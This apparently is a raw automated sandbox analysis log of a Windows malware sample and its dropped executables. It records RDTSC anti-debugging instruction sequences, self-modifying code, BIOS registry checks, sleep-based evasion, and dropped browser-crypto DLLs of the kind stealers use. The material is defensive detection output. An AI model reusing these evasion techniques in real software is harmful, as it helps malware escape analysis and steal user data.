Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50375 second address: 4C50384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50384 second address: 4C5038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C5038A second address: 4C5038E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B13 second address: 4C60B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B17 second address: 4C60B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B1B second address: 4C60B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B21 second address: 4C60B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC912593FBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B30 second address: 4C60B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B34 second address: 4C60B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B43 second address: 4C60B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B47 second address: 4C60B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60D3E second address: 4C60D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 462CE853h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop edx 0x00000017 mov ebx, eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60D6C second address: 4C60DBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FBC912593FBh 0x0000000b add cx, 3BEEh 0x00000010 jmp 00007FBC91259409h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FBC91259408h 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60DBC second address: 4C60DCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60DCB second address: 4C60DF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov di, cx 0x0000000f movzx eax, bx 0x00000012 popad 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60DF9 second address: 4C60E15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80DD3 second address: 4C80DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80DD9 second address: 4C80DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80DDD second address: 4C80E27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FBC91259400h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FBC91259400h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FBC91259408h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80E27 second address: 4C80E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80E2D second address: 4C80E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80E31 second address: 4C80E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80E40 second address: 4C80E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80E46 second address: 4C80E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC9118B8B9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80E63 second address: 4C80EC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ecx 0x0000000e jmp 00007FBC912593FEh 0x00000013 mov eax, dword ptr [76FA65FCh] 0x00000018 jmp 00007FBC91259400h 0x0000001d test eax, eax 0x0000001f jmp 00007FBC91259400h 0x00000024 je 00007FBD034FBEAAh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov bx, AC20h 0x00000031 mov ax, di 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C9000E second address: 4C9004E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007FBC9118B8B7h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 mov ebx, eax 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBC9118B8B6h 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C9004E second address: 4C90062 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 3A44h 0x00000007 mov eax, edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C90062 second address: 4C9009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FBC9118B8ADh 0x0000000a add al, 00000036h 0x0000000d jmp 00007FBC9118B8B1h 0x00000012 popfd 0x00000013 popad 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBC9118B8ADh 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C9009B second address: 4C900AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC912593FCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C900AB second address: 4C900AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C40056 second address: 4C40065 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C40065 second address: 4C4006B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C4006B second address: 4C4006F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C4006F second address: 4C4007D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C4007D second address: 4C400AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FBC91259406h 0x0000000a sbb eax, 371FAAA8h 0x00000010 jmp 00007FBC912593FBh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C400AB second address: 4C40142 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 mov bx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov di, ax 0x00000011 mov di, si 0x00000014 popad 0x00000015 and esp, FFFFFFF8h 0x00000018 jmp 00007FBC9118B8AEh 0x0000001d xchg eax, ecx 0x0000001e jmp 00007FBC9118B8B0h 0x00000023 push eax 0x00000024 jmp 00007FBC9118B8ABh 0x00000029 xchg eax, ecx 0x0000002a pushad 0x0000002b mov al, C4h 0x0000002d push ebx 0x0000002e mov esi, 56E047F3h 0x00000033 pop esi 0x00000034 popad 0x00000035 push ebx 0x00000036 pushad 0x00000037 mov ecx, 34E03261h 0x0000003c call 00007FBC9118B8AEh 0x00000041 pushfd 0x00000042 jmp 00007FBC9118B8B2h 0x00000047 add cx, 9428h 0x0000004c jmp 00007FBC9118B8ABh 0x00000051 popfd 0x00000052 pop eax 0x00000053 popad 0x00000054 mov dword ptr [esp], ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c mov ax, 26EDh 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C40142 second address: 4C4015C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC91259406h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C4015C second address: 4C401B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b jmp 00007FBC9118B8B7h 0x00000010 xchg eax, esi 0x00000011 jmp 00007FBC9118B8B6h 0x00000016 push eax 0x00000017 jmp 00007FBC9118B8ABh 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FBC9118B8B5h 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C401B9 second address: 4C401BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C401BF second address: 4C401C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C401C3 second address: 4C401C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C401C7 second address: 4C401E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBC9118B8B2h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C401E6 second address: 4C401F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC912593FEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C401F8 second address: 4C40229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007FBC9118B8ACh 0x0000000e mov dword ptr [esp], edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBC9118B8B7h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C40229 second address: 4C402A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBC912593FFh 0x00000009 or ch, 0000005Eh 0x0000000c jmp 00007FBC91259409h 0x00000011 popfd 0x00000012 push esi 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test esi, esi 0x00000019 jmp 00007FBC912593FAh 0x0000001e je 00007FBD035377A1h 0x00000024 jmp 00007FBC91259400h 0x00000029 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000030 jmp 00007FBC91259400h 0x00000035 je 00007FBD0353778Ah 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C402A3 second address: 4C402A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C402A9 second address: 4C402CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259404h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C402CA second address: 4C402CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C402CE second address: 4C402D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C402D2 second address: 4C402D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C402D8 second address: 4C4039A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259404h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 call 00007FBC91259408h 0x00000016 pushfd 0x00000017 jmp 00007FBC91259402h 0x0000001c xor si, 4308h 0x00000021 jmp 00007FBC912593FBh 0x00000026 popfd 0x00000027 pop esi 0x00000028 popad 0x00000029 test edx, 61000000h 0x0000002f pushad 0x00000030 mov esi, edx 0x00000032 pushad 0x00000033 mov ecx, ebx 0x00000035 popad 0x00000036 popad 0x00000037 jne 00007FBD0353773Ah 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007FBC91259402h 0x00000044 and ecx, 44077898h 0x0000004a jmp 00007FBC912593FBh 0x0000004f popfd 0x00000050 pushad 0x00000051 movzx esi, dx 0x00000054 call 00007FBC912593FBh 0x00000059 pop ecx 0x0000005a popad 0x0000005b popad 0x0000005c test byte ptr [esi+48h], 00000001h 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FBC91259402h 0x00000067 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C4039A second address: 4C4039F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C30791 second address: 4C30797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C30797 second address: 4C3079B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C3079B second address: 4C30809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FBC912593FEh 0x0000000f and esp, FFFFFFF8h 0x00000012 jmp 00007FBC91259400h 0x00000017 xchg eax, ebx 0x00000018 jmp 00007FBC91259400h 0x0000001d push eax 0x0000001e jmp 00007FBC912593FBh 0x00000023 xchg eax, ebx 0x00000024 jmp 00007FBC91259406h 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FBC912593FAh 0x00000033 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Special instruction interceptor: First address: 3AEAF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Special instruction interceptor: First address: 3AEBB9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Special instruction interceptor: First address: 57ABB2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Special instruction interceptor: First address: 55AC8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Special instruction interceptor: First address: 5DD5A8 instructions caused by: Self-modifying code
Source: C:\Users\userAAKKKEBFCG.exe Special instruction interceptor: First address: 8ED26 instructions caused by: Self-modifying code
Source: C:\Users\userAAKKKEBFCG.exe Special instruction interceptor: First address: 24FEE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 60EAF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 60EBB9 instructions caused by: Self-modifying code
Source: C:\Users\userAAKKKEBFCG.exe Special instruction interceptor: First address: 2D0A3D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 7DABB2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 7BAC8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 83D5A8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 43ED26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 5FFEE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 680A3D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Code function: 5_2_04CB0100 rdtsc 5_2_04CB0100
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1054
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1047
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 437
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1321
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 991
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 1075
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 380
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1940
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Window / User API: threadDelayed 1017
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Window / User API: threadDelayed 907
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Window / User API: threadDelayed 495
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Window / User API: threadDelayed 370
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Window / User API: threadDelayed 1224
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Window / User API: threadDelayed 431
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe API coverage: 7.8 %
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7684 Thread sleep count: 1054 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7684 Thread sleep time: -2109054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7708 Thread sleep count: 1047 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7708 Thread sleep time: -2095047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7656 Thread sleep count: 437 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7656 Thread sleep time: -13110000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7692 Thread sleep count: 1321 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7692 Thread sleep time: -2643321s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7892 Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7688 Thread sleep count: 991 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7688 Thread sleep time: -1982991s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7696 Thread sleep count: 1075 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7696 Thread sleep time: -2151075s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7800 Thread sleep count: 52 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7800 Thread sleep time: -104052s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7804 Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7804 Thread sleep time: -108054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7808 Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7808 Thread sleep time: -108054s >= -30000s
